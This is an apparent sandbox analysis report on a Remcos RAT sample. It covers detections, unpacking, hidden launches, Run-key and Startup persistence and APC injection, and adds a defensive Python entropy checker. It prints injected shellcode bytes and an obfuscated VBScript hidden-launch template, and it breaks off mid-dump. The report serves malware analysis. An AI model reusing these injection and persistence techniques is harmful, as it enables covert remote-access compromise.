14.4
0-day
SHA256: ea5f7ceccf5540860f32abe23534330ccb4b5b082d94b2afb5aa1e6d26a1ae56
File name: 632e3d1eedfc816446787802aad4152f.exe
Analysis duration: 177s
Last analysis:
File size: 674.0KB
Static scan: malicious. Dynamic analysis: malicious. AI SCORE=84. Detection-name tags: AVSARHER BTOMTW CKGENERIC CLOUD CONFIDENCE DELF DELPHILESS ELZG EMHC FAREIT FORMBOOK FYAR GDSDA GENERICKD HIGH CONFIDENCE HKQQHS KRYPTIK LOKIBOT MALICIOUS MODERATE QGW@AKK@V8NI R014C0WES20 REMCOS SCORE SUSGEN SUSPICIOUS PE TSCOPE UNSAFE WLPM X2066 ZELPHIF
Eagle Eye engine (鹰眼引擎)
Not detected: no Eagle Eye engine result is available for this sample.
Static verdict
Antivirus engines
Engine       Result                             Scan date   Engine version
McAfee       RDN/Generic.grp                    20200611    6.0.6.653
Alibaba      Trojan:Win32/FormBook.36aa18e4     20190527    0.3.0.5
CrowdStrike  win/malicious_confidence_80% (W)   20190702    1.0
Baidu        (no detection)                     20190318    1.0.0.2
Avast        Win32:Malware-gen                  20200611    18.4.3895.0
Tencent      Win32.Trojan.Kryptik.Wlpm          20200611    1.0.0.1
Kingsoft     (no detection)                     20200611    2013.8.14.323
Behavioral verdict
Dynamic indicators
The indicators below (a dropped remcos.exe, a Run key named remcos, the same stub queued by APC into freshly allocated RWX memory in other processes, a VBScript launcher in the Startup folder) are consistent with the Remcos RAT behind a packer/loader. Most of the static names above are generic (Generic.grp, Malware-gen, Kryptik, malicious_confidence_80%); only Alibaba's FormBook label names a specific family, so the dynamic evidence should carry more weight when classifying this sample.
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
Allocates read-write-execute memory (usually to unpack itself) (50 of 117 events)
Common to every row: protection 64 (PAGE_EXECUTE_READWRITE); process_handle 0xffffffff, the NtCurrentProcess() pseudo-handle, so process_identifier is the calling process itself; stack_dep_bypass, stack_pivoted and heap_dep_bypass 0; status success, return 0, repeated 0. allocation_type is 4096 (MEM_COMMIT) or 12288 (MEM_COMMIT|MEM_RESERVE). Each process follows the same three-step pattern: commit one RWX page, re-protect the 40960-byte range at 0x00468000 (inside its own image when loaded at the default 0x00400000 base) as RWX, then reserve and commit a second RWX page. This is the loader's in-place unpacking routine; the PIDs include processes that the Process32NextW entries further down identify as remcos.exe (3332, 3944, 1912) and sdfghjkhjjjjjg.exe (3728, 3260), so every dropped copy runs the same unpacker. The timestamps fall into two clusters about five hours apart (1619610617 and 1619628921 onwards), so the table aggregates more than one analysis run of the same file.

Time               API                      PID   size               allocation_type         base_address
1619610617.875     NtAllocateVirtualMemory  2772  region_size 4096   MEM_COMMIT              0x003e0000
1619610618.078     NtProtectVirtualMemory   2772  length 40960       -                       0x00468000
1619610618.078     NtAllocateVirtualMemory  2772  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01f60000
1619628921.557     NtAllocateVirtualMemory  2144  region_size 4096   MEM_COMMIT              0x003d0000
1619628921.572     NtProtectVirtualMemory   2144  length 40960       -                       0x00468000
1619628921.572     NtAllocateVirtualMemory  2144  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01f50000
1619628933.807     NtAllocateVirtualMemory  1344  region_size 4096   MEM_COMMIT              0x003e0000
1619628933.822     NtProtectVirtualMemory   1344  length 40960       -                       0x00468000
1619628933.822     NtAllocateVirtualMemory  1344  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x00790000
1619628935.1045    NtAllocateVirtualMemory  3164  region_size 4096   MEM_COMMIT              0x003d0000
1619628935.1045    NtProtectVirtualMemory   3164  length 40960       -                       0x00468000
1619628935.1195    NtAllocateVirtualMemory  3164  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01f50000
1619628936.52575   NtAllocateVirtualMemory  3332  region_size 4096   MEM_COMMIT              0x003e0000
1619628936.54175   NtProtectVirtualMemory   3332  length 40960       -                       0x00468000
1619628936.54175   NtAllocateVirtualMemory  3332  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x00550000
1619628947.40025   NtAllocateVirtualMemory  3460  region_size 4096   MEM_COMMIT              0x008b0000
1619628947.40025   NtProtectVirtualMemory   3460  length 40960       -                       0x00468000
1619628947.40025   NtAllocateVirtualMemory  3460  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01fa0000
1619628948.3545    NtAllocateVirtualMemory  3644  region_size 4096   MEM_COMMIT              0x003e0000
1619628948.3695    NtProtectVirtualMemory   3644  length 40960       -                       0x00468000
1619628948.3695    NtAllocateVirtualMemory  3644  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01fa0000
1619628949.197625  NtAllocateVirtualMemory  3904  region_size 4096   MEM_COMMIT              0x003f0000
1619628949.197625  NtProtectVirtualMemory   3904  length 40960       -                       0x00468000
1619628949.197625  NtAllocateVirtualMemory  3904  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01f60000
1619628949.2295    NtAllocateVirtualMemory  3944  region_size 4096   MEM_COMMIT              0x003e0000
1619628949.2295    NtProtectVirtualMemory   3944  length 40960       -                       0x00468000
1619628949.2295    NtAllocateVirtualMemory  3944  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01fa0000
1619628960.6975    NtAllocateVirtualMemory  3124  region_size 4096   MEM_COMMIT              0x00350000
1619628960.7135    NtProtectVirtualMemory   3124  length 40960       -                       0x00468000
1619628960.7135    NtAllocateVirtualMemory  3124  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x00870000
1619628961.588375  NtAllocateVirtualMemory  3168  region_size 4096   MEM_COMMIT              0x003f0000
1619628961.588375  NtProtectVirtualMemory   3168  length 40960       -                       0x00468000
1619628961.588375  NtAllocateVirtualMemory  3168  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01fa0000
1619628961.63575   NtAllocateVirtualMemory  3552  region_size 4096   MEM_COMMIT              0x003d0000
1619628961.63575   NtProtectVirtualMemory   3552  length 40960       -                       0x00468000
1619628961.63575   NtAllocateVirtualMemory  3552  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01f50000
1619628962.07225   NtAllocateVirtualMemory  3728  region_size 4096   MEM_COMMIT              0x00580000
1619628962.08825   NtProtectVirtualMemory   3728  length 40960       -                       0x00468000
1619628962.08825   NtAllocateVirtualMemory  3728  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x01e70000
1619628962.479875  NtAllocateVirtualMemory  1100  region_size 4096   MEM_COMMIT              0x003f0000
1619628962.494875  NtProtectVirtualMemory   1100  length 40960       -                       0x00468000
1619628962.494875  NtAllocateVirtualMemory  1100  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x020a0000
1619628963.697     NtAllocateVirtualMemory  1912  region_size 4096   MEM_COMMIT              0x00360000
1619628963.775     NtProtectVirtualMemory   1912  length 40960       -                       0x00468000
1619628963.854     NtAllocateVirtualMemory  1912  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x00670000
1619628966.088875  NtAllocateVirtualMemory  3260  region_size 4096   MEM_COMMIT              0x003d0000
1619628966.088875  NtProtectVirtualMemory   3260  length 40960       -                       0x00468000
1619628966.104875  NtAllocateVirtualMemory  3260  region_size 4096   MEM_COMMIT|MEM_RESERVE  0x00580000
1619628974.294124  NtAllocateVirtualMemory  4088  region_size 4096   MEM_COMMIT              0x003f0000
1619628974.310124  NtProtectVirtualMemory   4088  length 40960       -                       0x00468000
A process attempted to delay the analysis task (1 event)
description sdfghjkhjjjjjg.exe tried to sleep 489 seconds, actually delayed analysis time by 489 seconds
Creates executable files on the filesystem (2 events)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZM.vbs
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
Creates a suspicious process (1 event)
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
Drops a binary and executes it (2 events)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs
Drops an executable to the user AppData folder (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
A process created a hidden window (12 events)
Common to every row: API ShellExecuteExW; show_type 0 (SW_HIDE, the window is never shown); status success, return 1, repeated 0. The rows alternate between launching the dropped install.vbs (no parameters; filepath_r is the 8.3 short form of the same path) and launching cmd with /c and the remcos.exe path. Rows are in the order the report lists them, which is not strictly chronological.

Time               filepath                                                          parameters
1619628934.275125  C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs   (none)   filepath_r C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
1619628936.104375  cmd                                                               /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
1619628947.447625  C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs   (none)   filepath_r C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
1619628948.88525   cmd                                                               /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
1619628960.729875  C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs   (none)   filepath_r C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
1619628962.1355    cmd                                                               /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
1619628961.869125  C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs   (none)   filepath_r C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
1619628963.369625  cmd                                                               /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
1619628974.402937  C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs   (none)   filepath_r C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
1619628982.427937  cmd                                                               /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
1619628976.386687  C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\install.vbs   (none)   filepath_r C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs
1619628978.750875  cmd                                                               /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 of 93 events)
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
entropy 7.28909576575791 section {'size_of_data': '0x0002c200', 'virtual_address': '0x00083000', 'entropy': 7.28909576575791, 'name': '.rsrc', 'virtual_size': '0x0002c1d0'} description A section with a high entropy has been found
entropy 0.262258543833581 description Overall entropy of this PE file is high
Reading the two marks: the first is the Shannon entropy of the .rsrc section (7.29 bits per byte, close to the 8.0 of random or encrypted data); the second is not an entropy but the fraction of section data held in high-entropy sections (the 0x2c200 bytes of .rsrc out of roughly 674 KB of section data, about 26%), which the signature reports under the same field name. A packed payload stored as a resource is the usual reason for a high-entropy .rsrc in an otherwise ordinary executable.
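To reproduce these two marks on any PE, here is an added example (not the sandbox's code and not part of this report) that parses the section table, computes per-section Shannon entropy and applies the rule the marks reflect: a section above 6.8 bits/byte is flagged, and when flagged sections hold more than 20% of section data the file is flagged with that fraction as the "entropy" value. The 6.8 and 0.2 thresholds are assumptions taken from the Cuckoo community signature whose output format this matches; the PE builder at the end constructs a synthetic file (a large low-entropy .text next to a 0x2c200-byte high-entropy .rsrc, sized like the report's) so the script runs offline without the sample.

```python
"""
Reproduce the sandbox's packer-entropy marks on a PE file.

Added example; not the sandbox's code and not part of this report. A section
whose Shannon entropy exceeds 6.8 bits/byte is flagged, and when flagged
sections hold more than 20% of all section data the file is flagged with that
fraction reported as 'entropy'. Both thresholds are assumptions taken from the
Cuckoo community signature this output format matches. build_test_pe() makes a
synthetic, non-runnable PE so the script works offline without the sample.
"""
import hashlib
import math
import struct
from collections import Counter
from typing import Iterator, List, Tuple

SECTION_ENTROPY_THRESHOLD = 6.8   # bits per byte
OVERALL_FRACTION_THRESHOLD = 0.2  # share of section bytes in high-entropy sections


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(pe: bytes) -> Iterator[Tuple[str, int, int, bytes]]:
    """Yield (name, size_of_data, virtual_address, raw_bytes) from the section table:
    DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> skip optional header ->
    40-byte IMAGE_SECTION_HEADER entries."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        yield name, raw_size, vaddr, pe[raw_ptr:raw_ptr + raw_size]


def packer_entropy_marks(pe: bytes) -> List[dict]:
    """Apply the signature; returns the marks in the order the sandbox prints them."""
    marks, total_data, high_data = [], 0, 0
    for name, size_of_data, vaddr, raw in pe_sections(pe):
        total_data += size_of_data
        ent = shannon_entropy(raw)
        if ent > SECTION_ENTROPY_THRESHOLD:
            high_data += size_of_data
            marks.append({"entropy": ent, "section": name, "size_of_data": hex(size_of_data),
                          "virtual_address": hex(vaddr),
                          "description": "A section with a high entropy has been found"})
    if total_data and high_data / total_data > OVERALL_FRACTION_THRESHOLD:
        marks.append({"entropy": high_data / total_data,
                      "description": "Overall entropy of this PE file is high"})
    return marks


def build_test_pe(sections: List[Tuple[str, bytes]]) -> bytes:
    """Constructed input: a minimal PE32 skeleton whose only job is to carry a section
    table and raw section data. Section data must be a multiple of 0x200 bytes."""
    opt_size = 224
    headers_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    data_start = (headers_len + 0x1FF) & ~0x1FF                 # 512-byte file alignment
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)     # PE32 magic, rest zero
    table, blobs, ptr, vaddr = b"", b"", data_start, 0x1000
    for name, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(raw), vaddr, len(raw), ptr, 0, 0, 0, 0, 0x40000040)
        blobs += raw
        ptr += len(raw)
        vaddr += (len(raw) + 0xFFF) & ~0xFFF
    headers = dos + b"PE\0\0" + coff + opt + table
    return headers + b"\0" * (data_start - len(headers)) + blobs


# Constructed section contents (not from the analysed file). The .rsrc size copies the
# report's 0x2c200 bytes; the .text is a large, repetitive, low-entropy block.
LOW_ENTROPY_TEXT = (b"\x55\x8b\xec" + b"\x90" * 13) * (0x7A000 // 16)
HIGH_ENTROPY_RSRC = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest()
                             for i in range(0x2C200 // 32))


def analyse_sample() -> List[dict]:
    """Run the signature over the constructed PE and return its marks."""
    return packer_entropy_marks(build_test_pe([(".text", LOW_ENTROPY_TEXT),
                                               (".rsrc", HIGH_ENTROPY_RSRC)]))


if __name__ == "__main__":
    for mark in analyse_sample():
        print(mark)
```

Run it as a script to print the marks; the ratio for the synthetic file comes out near 0.266, the same order as the report's 0.262. To check a real file, pass its bytes to packer_entropy_marks() instead of the constructed PE. A high-entropy .rsrc alone is not proof of packing (embedded compressed images or certificates also score high), so treat the mark as a reason to look at what the resource contains.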
Expresses interest in specific running processes (2 events)
process notepad.exe
process sdfghjkhjjjjjg.exe
notepad.exe is the process the injector looks up by name; pid 3780, listed as notepad.exe in the Process32NextW entries below, is one of the APC injection targets (pid 1100 -> 3780).
Repeatedly searches for a not-found process, you may want to run a web browser during analysis (38 events)
Common to every row: API Process32NextW; status failed, return 0, repeated 0. A failing Process32NextW marks the end of one walk over a process snapshot; process_name and process_identifier are the PROCESSENTRY32W fields as the monitor logged them at that point (in practice the last entry enumerated), not the process being searched for. inject-x86.exe is the name of the Cuckoo monitor's injector helper, i.e. sandbox tooling that happened to be in the process list, not something the sample dropped.

Time               process_name         snapshot_handle  process_identifier
1619610618.094     conhost.exe          0x000000f8       1948
1619628921.572     inject-x86.exe       0x000000f8       1812
1619628933.822     dllhost.exe          0x000000f8       1912
1619628934.916     wscript.exe          0x00000124       3076
1619628936.54175   remcos.exe           0x000000f8       3332
1619628948.16625   wscript.exe          0x00000118       3556
1619628949.197625  remcos.exe           0x000000f8       3944
1619628949.2295    remcos.exe           0x000000f8       3944
1619628961.4795    inject-x86.exe       0x0000011c       3604
1619628965.916375  remcos.exe           0x00000190       1912
1619628961.63575   sdfghjkhjjjjjg.exe   0x000000f8       3728
1619628962.08825   wscript.exe          0x000000f8       3376
1619628963.963     remcos.exe           0x000000f8       1912
1619628966.104875  sdfghjkhjjjjjg.exe   0x000000f8       3260
1619628975.201124  notepad.exe          0x0000011c       3780
1619628975.515436  inject-x86.exe       0x000000f8       3296
1619629024.593061  inject-x86.exe       0x000007d4       5064
1619628979.511187  inject-x86.exe       0x000000f8       2184
1619628983.576403  remcos.exe           0x000000f8       2868
1619628991.315284  inject-x86.exe       0x000000fc       4124
1619628992.003534  sdfghjkhjjjjjg.exe   0x000000f8       4212
1619628992.831659  inject-x86.exe       0x000000f8       4416
1619629013.581659  sdfghjkhjjjjjg.exe   0x000003e4       4304
1619628994.987286  inject-x86.exe       0x000000f8       4704
1619629003.471286  inject-x86.exe       0x0000022c       5028
1619628998.065659  inject-x86.exe       0x000000f8       4868
1619629018.237659  inject-x86.exe       0x000003d0       4860
1619629000.971159  inject-x86.exe       0x000000f8       4996
1619629003.893534  inject-x86.exe       0x000000f8       5092
1619629013.862284  inject-x86.exe       0x000000f8       4500
1619629015.159784  inject-x86.exe       0x000000f8       4072
1619629018.502909  inject-x86.exe       0x000000f8       4288
1619629022.081034  inject-x86.exe       0x000000f8       5064
1619629025.096284  inject-x86.exe       0x000000f8       4540
1619629025.487534  inject-x86.exe       0x000000f8       2268
1619629028.002909  inject-x86.exe       0x000000f8       3800
1619629043.017909  inject-x86.exe       0x000000f8       2972
1619629047.830909  inject-x86.exe       0x000000fc       4240
Creates an Alternate Data Stream (ADS) (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe:ZoneIdentifier
Allocates execute permission to another process indicative of possible code injection (7 events)
Common to every row: API NtAllocateVirtualMemory; region_size 4096; protection 64 (PAGE_EXECUTE_READWRITE); process_handle 0x00000100, a handle to another process, so process_identifier is the target rather than the caller; allocation_type 12288 (MEM_COMMIT|MEM_RESERVE); stack_dep_bypass, stack_pivoted and heap_dep_bypass 0; status success, return 0, repeated 0. The caller-to-target pairs are listed under the NtQueueApcThread signature below.

Time               target process_identifier  base_address
1619610631.281     1752                       0x000b0000
1619628948.60475   3716                       0x000b0000
1619628961.2605    1880                       0x000b0000
1619628974.541875  3780                       0x000b0000
1619628976.65      628                        0x000f0000
1619628991.574187  4136                       0x000b0000
1619628999.951403  4756                       0x000b0000
Installs itself for autorun at Windows startup (7 events)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\remcos reg_value "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe" (the same key and value recorded 6 times)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZM.vbs
Creates a thread using NtQueueApcThread in a remote process potentially indicative of process injection (14 events)
Process injection Process 2772 created a thread in remote process 1752
Process injection Process 3332 created a thread in remote process 3716
Process injection Process 3944 created a thread in remote process 1880
Process injection Process 1100 created a thread in remote process 3780
Process injection Process 1912 created a thread in remote process 628
Process injection Process 3748 created a thread in remote process 4136
Process injection Process 2868 created a thread in remote process 4756
Common to every row: API NtQueueApcThread; thread_handle 0x00000108; status success, return 0, repeated 0. function_address is always base + 0x5c0 of the RWX region allocated in that target just before (0x000b05c0 for a region at 0x000b0000, 0x000f05c0 for the pid 628 region at 0x000f0000), and parameter points at a second buffer (0x000c0000 for most targets) that the WriteProcessMemory records below show to be a string block rather than code. A user-mode APC queued on a thread of the target runs the stub when that thread next becomes alertable; for a freshly created, suspended main thread that is as soon as it is resumed.

Time               process_identifier  function_address  parameter
1619610631.281     1752                0x000b05c0        0x000c0000
1619628948.60475   3716                0x000b05c0        0x000c0000
1619628961.2605    1880                0x000b05c0        0x000c0000
1619628974.541875  3780                0x000b05c0        0x000c0000
1619628976.65      628                 0x000f05c0        0x00100000
1619628991.574187  4136                0x000b05c0        0x00100000
1619628999.951403  4756                0x000b05c0        0x000c0000
Potential code injection by writing to the memory of another process (14 events)
Two writes per target: the stub itself at the base of the RWX region (0x000b0000) and a parameter block 64 KiB above it at 0x000c0000, the address later passed as the APC parameter. The parameter block is a set of strings (shown run together; the separators did not survive the rendering): the original sample path, the dropped copy, the quoted command line, the marker ZM and a VBScript template of the form set wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False, where %ls is a wide-string format specifier that receives the path and the 0 runs the target with a hidden window. The mixed-case spelling is deliberate: VBScript is case-insensitive, but case-sensitive string signatures on "WScript.Shell" are not.
Time & API Arguments Status Return Repeated
1619610631.281
WriteProcessMemory
process_identifier: 1752
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619610631.281
WriteProcessMemory
process_identifier: 1752
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\632e3d1eedfc816446787802aad4152f.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\632e3d1eedfc816446787802aad4152f.exe" ZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628948.60475
WriteProcessMemory
process_identifier: 3716
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F 